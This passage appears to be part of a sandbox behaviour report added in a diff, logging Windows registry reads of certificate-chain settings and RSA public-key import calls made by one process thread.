+ { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x000006b8" + }, + { + "name": "ObjectAttributesName", + "value": "CryptDllImportPublicKeyInfoEx2" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Cryptography\\OID\\EncodingType 1\\CryptDllImportPublicKeyInfoEx2" + } + ], + "repeated": 0, + "id": 2815 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fd269", + "parentcaller": "0x756aadee", + "category": "registry", + "api": "NtEnumerateKey", + "status": false, + "return": "0xffffffff8000001a", + "pretty_return": "NO_MORE_ENTRIES", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000724" + }, + { + "name": "Index", + "value": "2" + } + ], + "repeated": 0, + "id": 2816 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x767f770e", + "parentcaller": "0x767fe94d", + "category": "crypto", + "api": "CryptDecodeObjectEx", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "CertEncodingType", + "value": "0x00000001" + }, + { + "name": "Encoded", + "value": "0\\x82\\x01\n\\x02\\x82\\x01\\x01\\x00\\xde\\x82\\x8e\\x84\\x92\\xf9\\xab\\xec\\xb9$\\x14\\xc5\\xedoY\\xec\t\\x0f\\x9c%!\\x1a\\x99w\\xaf\\xc6\\xfcFX\\x9c\\x0b\\xc2\\xb9:\\xd6\\x03[\\x14$?\\xdeuc\\x0cB6\\x11\\xfe\\x0b\\xf4\\x05>/\\xbfF\\xa3\\xadI\\xfbdR!\\xe5\\xd8V\\x94\\x99z%\\xd8<\\xf1{vd\\xce\\xb8\\x9c{\r$t\\xb7F\\xc5\\xd3I\\x83cUb\\x9c\\xe81{'TY}sQ\\xea\\xec=\\x9c\\xf8\\x8c\\xdb\\xf5\\xf0\\x86\\xf8(X{\\x93W\\x86^\\xf4\\x8fj\\xb1\\x89\\x9ae\\xc9\\xed\\x83JIN\\xd9h\\x08\\xba7e)\\xcc\\x1eX*\\xef\\xa5B\\xa6\\xe8\\x83\\xd7\\xfdh\\xfad\\xa9s\\xa8]X@X\\x89\\xf3O\\xfc\\x93KA\\x96\\xdb\\xd0w\\x86G0\\x13\\x7fR\\x190F\\xf5Z\\xc3M\\xa6\"\\x03\\x96\\xdf\\xe7\\xb3\\x1b\\x8c\\x03\\x03cO1\\x93\\x911>\\x17\\xe2\\x0f\\xf8O9\\xab>\\xe6j\\xafWF\\xa734\\xd5\\t\t\\x9f.i\\x86\\x15\\xe0G\t\\xa5>\\xd5N\\x15\\xa8r\\xca<\\xc7\\xb1\\x19:\\xd4\\xa40" + }, + { + "name": "Flags", + "value": "0x00008005" + } + ], + "repeated": 0, + "id": 2817 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756bfbba", + "parentcaller": "0x75f21256", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "bcryptPrimitives.dll" + }, + { + "name": "ModuleHandle", + "value": "0x76090000" + }, + { + "name": "FunctionName", + "value": "GetAsymmetricEncryptionInterface" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x760a0910" + } + ], + "repeated": 0, + "id": 2818 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x767fde90", + "parentcaller": "0x767ff4ed", + "category": "crypto", + "api": "BCryptImportKeyPair", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyBlob", + "value": "RSA1\\x00\\x08\\x00\\x00\\x03\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01\\xde\\x82\\x8e\\x84\\x92\\xf9\\xab\\xec\\xb9$\\x14\\xc5\\xedoY\\xec\t\\x0f\\x9c%!\\x1a\\x99w\\xaf\\xc6\\xfcFX\\x9c\\x0b\\xc2\\xb9:\\xd6\\x03[\\x14$?\\xdeuc\\x0cB6\\x11\\xfe\\x0b\\xf4\\x05>/\\xbfF\\xa3\\xadI\\xfbdR!\\xe5\\xd8V\\x94\\x99z%\\xd8<\\xf1{vd\\xce\\xb8\\x9c{\r$t\\xb7F\\xc5\\xd3I\\x83cUb\\x9c\\xe81{'TY}sQ\\xea\\xec=\\x9c\\xf8\\x8c\\xdb\\xf5\\xf0\\x86\\xf8(X{\\x93W\\x86^\\xf4\\x8fj\\xb1\\x89\\x9ae\\xc9\\xed\\x83JIN\\xd9h\\x08\\xba7e)\\xcc\\x1eX*\\xef\\xa5B\\xa6\\xe8\\x83\\xd7\\xfdh\\xfad\\xa9s\\xa8]X@X\\x89\\xf3O\\xfc\\x93KA\\x96\\xdb\\xd0w\\x86G0\\x13\\x7fR\\x190F\\xf5Z\\xc3M\\xa6\"\\x03\\x96\\xdf\\xe7\\xb3\\x1b\\x8c\\x03\\x03cO1\\x93\\x911>\\x17\\xe2\\x0f\\xf8O9\\xab>\\xe6j\\xafWF\\xa734\\xd5\\t\t\\x9f.i\\x86\\x15\\xe0" + }, + { + "name": "Flags", + "value": "0x00000000" + }, + { + "name": "CryptKey", + "value": "0x00562d78" + }, + { + "name": "Length", + "value": "283" + } + ], + "repeated": 0, + "id": 2819 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x76801e39", + "parentcaller": "0x76801dfb", + "category": "crypto", + "api": "CryptDecodeObjectEx", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "CertEncodingType", + "value": "0x00000001" + }, + { + "name": "Encoded", + "value": "0\\x82\\x01\n\\x02\\x82\\x01\\x01\\x00\\xde\\x82\\x8e\\x84\\x92\\xf9\\xab\\xec\\xb9$\\x14\\xc5\\xedoY\\xec\t\\x0f\\x9c%!\\x1a\\x99w\\xaf\\xc6\\xfcFX\\x9c\\x0b\\xc2\\xb9:\\xd6\\x03[\\x14$?\\xdeuc\\x0cB6\\x11\\xfe\\x0b\\xf4\\x05>/\\xbfF\\xa3\\xadI\\xfbdR!\\xe5\\xd8V\\x94\\x99z%\\xd8<\\xf1{vd\\xce\\xb8\\x9c{\r$t\\xb7F\\xc5\\xd3I\\x83cUb\\x9c\\xe81{'TY}sQ\\xea\\xec=\\x9c\\xf8\\x8c\\xdb\\xf5\\xf0\\x86\\xf8(X{\\x93W\\x86^\\xf4\\x8fj\\xb1\\x89\\x9ae\\xc9\\xed\\x83JIN\\xd9h\\x08\\xba7e)\\xcc\\x1eX*\\xef\\xa5B\\xa6\\xe8\\x83\\xd7\\xfdh\\xfad\\xa9s\\xa8]X@X\\x89\\xf3O\\xfc\\x93KA\\x96\\xdb\\xd0w\\x86G0\\x13\\x7fR\\x190F\\xf5Z\\xc3M\\xa6\"\\x03\\x96\\xdf\\xe7\\xb3\\x1b\\x8c\\x03\\x03cO1\\x93\\x911>\\x17\\xe2\\x0f\\xf8O9\\xab>\\xe6j\\xafWF\\xa734\\xd5\\t\t\\x9f.i\\x86\\x15\\xe0G\t\\xa5>\\xd5N\\x15\\xa8r\\xca<\\xc7\\xb1\\x19:\\xd4\\xa40" + }, + { + "name": "Flags", + "value": "0x00008000" + } + ], + "repeated": 0, + "id": 2820 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x76801d87", + "parentcaller": "0x76801cb7", + "category": "crypto", + "api": "CryptImportKey", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "KeyBlob", + "value": "\\x06\\x02\\x00\\x00\\x00\\xa4\\x00\\x00RSA1\\x00\\x08\\x00\\x00\\x01\\x00\\x01\\x00a]\\xc8\\xb6\\xd7\\xf8M+\\x170\\xa4\\xd4:\\x19\\xb1\\xc7<\\xcar\\xa8\\x15N\\xd5>\\xa5\tG\\xe0\\x15\\x86i.\\x9f\tt\\\\xd543\\xa7FW\\xafj\\xe6>\\xab9O\\xf8\\x0f\\xe2\\x17>1\\x91\\x931Oc\\x03\\x03\\x8c\\x1b\\xb3\\xe7\\xdf\\x96\\x03\"\\xa6M\\xc3Z\\xf5F0\\x19R\\x7f\\x130G\\x86w\\xd0\\xdb\\x96AK\\x93\\xfcO\\xf3\\x89X@X]\\xa8s\\xa9d\\xfah\\xfd\\xd7\\x83\\xe8\\xa6B\\xa5\\xef*X\\x1e\\xcc)e7\\xba\\x08h\\xd9NIJ\\x83\\xed\\xc9e\\x9a\\x89\\xb1j\\x8f\\xf4^\\x86W\\x93{X(\\xf8\\x86\\xf0\\xf5\\xdb\\x8c\\xf8\\x9c=\\xec\\xeaQs}YT'{1\\xe8\\x9cbUc\\x83I\\xd3\\xc5F\\xb7t$\r{\\x9c\\xb8\\xcedv{\\xf1<\\xd8%z\\x99\\x94V\\xd8\\xe5!Rd\\xfbI\\xad\\xa3F\\xbf/>\\x05\\xf4\\x0b\\xfe\\x116B\\x0ccu\\xde?$\\x14[\\x03\\xd6:\\xb9\\xc2\\x0b\\x9cXF\\xfc\\xc6\\xafw\\x99\\x1a!" + }, + { + "name": "Flags", + "value": "0x00000000" + }, + { + "name": "CryptKey", + "value": "0x05850ff8" + }, + { + "name": "Length", + "value": "276" + } + ], + "repeated": 0, + "id": 2821 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x767ed925", + "parentcaller": "0x767ed8d8", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 1, + "id": 2822 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756ad931", + "parentcaller": "0x756ad70b", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 2823 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000724" + }, + { + "name": "DesiredAccess", + "value": "0x00020119", + "pretty_value": "KEY_QUERY_VALUE|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|KEY_WOW64_64KEY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000011c" + }, + { + "name": "ObjectAttributesName", + "value": "Software\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate" + } + ], + "repeated": 0, + "id": 2824 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000724" + }, + { + "name": "ValueName", + "value": "DisallowedCertSyncDeltaTime" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate\\DisallowedCertSyncDeltaTime" + } + ], + "repeated": 0, + "id": 2825 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756ad931", + "parentcaller": "0x756ad70b", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 2826 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000000" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000011c" + }, + { + "name": "ObjectAttributesName", + "value": "Software\\Policies\\Microsoft\\SystemCertificates\\Root\\ProtectedRoots" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\SystemCertificates\\Root\\ProtectedRoots" + } + ], + "repeated": 0, + "id": 2827 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756ad931", + "parentcaller": "0x756ad70b", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 2828 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000000" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000011c" + }, + { + "name": "ObjectAttributesName", + "value": "Software\\Policies\\Microsoft\\SystemCertificates\\ChainEngine\\Config" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\SystemCertificates\\ChainEngine\\Config" + } + ], + "repeated": 0, + "id": 2829 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000508" + }, + { + "name": "ValueName", + "value": "DisableMandatoryBasicConstraints" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\DisableMandatoryBasicConstraints" + } + ], + "repeated": 0, + "id": 2830 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000508" + }, + { + "name": "ValueName", + "value": "DisableCANameConstraints" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\DisableCANameConstraints" + } + ], + "repeated": 0, + "id": 2831 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000508" + }, + { + "name": "ValueName", + "value": "DisableUnsupportedCriticalExtensions" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\DisableUnsupportedCriticalExtensions" + } + ], + "repeated": 0, + "id": 2832 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000508" + }, + { + "name": "ValueName", + "value": "MaxAIAUrlCountInCert" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\MaxAIAUrlCountInCert" + } + ], + "repeated": 0, + "id": 2833 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000508" + }, + { + "name": "ValueName", + "value": "MaxAIAUrlRetrievalCountPerChain" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\MaxAIAUrlRetrievalCountPerChain" + } + ], + "repeated": 0, + "id": 2834 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000508" + }, + { + "name": "ValueName", + "value": "MaxUrlRetrievalByteCount" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\MaxUrlRetrievalByteCount" + } + ], + "repeated": 0, + "id": 2835 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000508" + }, + { + "name": "ValueName", + "value": "MaxAIAUrlRetrievalByteCount" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\MaxAIAUrlRetrievalByteCount" + } + ], + "repeated": 0, + "id": 2836 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000508" + }, + { + "name": "ValueName", + "value": "MaxAIAUrlRetrievalCertCount" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\MaxAIAUrlRetrievalCertCount" + } + ], + "repeated": 0, + "id": 2837 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000508" + }, + { + "name": "ValueName", + "value": "MaxVerifySignatureCountPerChain" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\MaxVerifySignatureCountPerChain" + } + ], + "repeated": 0, + "id": 2838 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000508" + }, + { + "name": "ValueName", + "value": "MaxIssuerDepth" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\MaxIssuerDepth" + } + ], + "repeated": 0, + "id": 2839 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000508" + }, + { + "name": "ValueName", + "value": "MaxPathCountPerChain" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\MaxPathCountPerChain" + } + ], + "repeated": 0, + "id": 2840 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000508" + }, + { + "name": "ValueName", + "value": "CryptnetPreFetchTriggerPeriodSeconds" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\CryptnetPreFetchTriggerPeriodSeconds" + } + ], + "repeated": 0, + "id": 2841 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000508" + }, + { + "name": "ValueName", + "value": "EnableWeakSignatureFlags" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\EnableWeakSignatureFlags" + } + ], + "repeated": 0, + "id": 2842 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000508" + }, + { + "name": "ValueName", + "value": "MinRsaPubKeyBitLength" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\MinRsaPubKeyBitLength" + } + ], + "repeated": 0, + "id": 2843 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000508" + }, + { + "name": "ValueName", + "value": "WeakRsaPubKeyTime" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\WeakRsaPubKeyTime" + } + ], + "repeated": 0, + "id": 2844 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000508" + }, + { + "name": "ValueName", + "value": "ChainCacheResyncFiletime" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\ChainCacheResyncFiletime" + } + ], + "repeated": 0, + "id": 2845 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000508" + }, + { + "name": "ValueName", + "value": "EnableStrictChecksFlags" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\EnableStrictChecksFlags" + } + ], + "repeated": 0, + "id": 2846 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000724" + }, + { + "name": "DesiredAccess", + "value": "0x00020119", + "pretty_value": "KEY_QUERY_VALUE|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|KEY_WOW64_64KEY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000508" + }, + { + "name": "ObjectAttributesName", + "value": "Default" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\Default" + } + ], + "repeated": 0, + "id": 2847 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756ad931", + "parentcaller": "0x756ad70b", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 2848 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000006b8" + }, + { + "name": "DesiredAccess", + "value": "0x00020119", + "pretty_value": "KEY_QUERY_VALUE|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|KEY_WOW64_64KEY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000011c" + }, + { + "name": "ObjectAttributesName", + "value": "SYSTEM\\CurrentControlSet\\Control\\CI\\Config" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\CI\\Config" + } + ], + "repeated": 0, + "id": 2849 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000006d0" + }, + { + "name": "DesiredAccess", + "value": "0x00020119", + "pretty_value": "KEY_QUERY_VALUE|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|KEY_WOW64_64KEY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x000006b8" + }, + { + "name": "ObjectAttributesName", + "value": "Default" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\CI\\Config\\Default" + } + ], + "repeated": 0, + "id": 2850 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000508" + }, + { + "name": "ValueName", + "value": "WeakMD5ThirdPartyFlags" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\WeakMD5ThirdPartyFlags" + } + ], + "repeated": 0, + "id": 2851 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000724" + }, + { + "name": "ValueName", + "value": "WeakMD5ThirdPartyFlags" + }, + { + "name": "Type", + "value": "4", + "pretty_value": "REG_DWORD" + }, + { + "name": "Information", + "value": "18446744071705722880" + }, + { + "name": 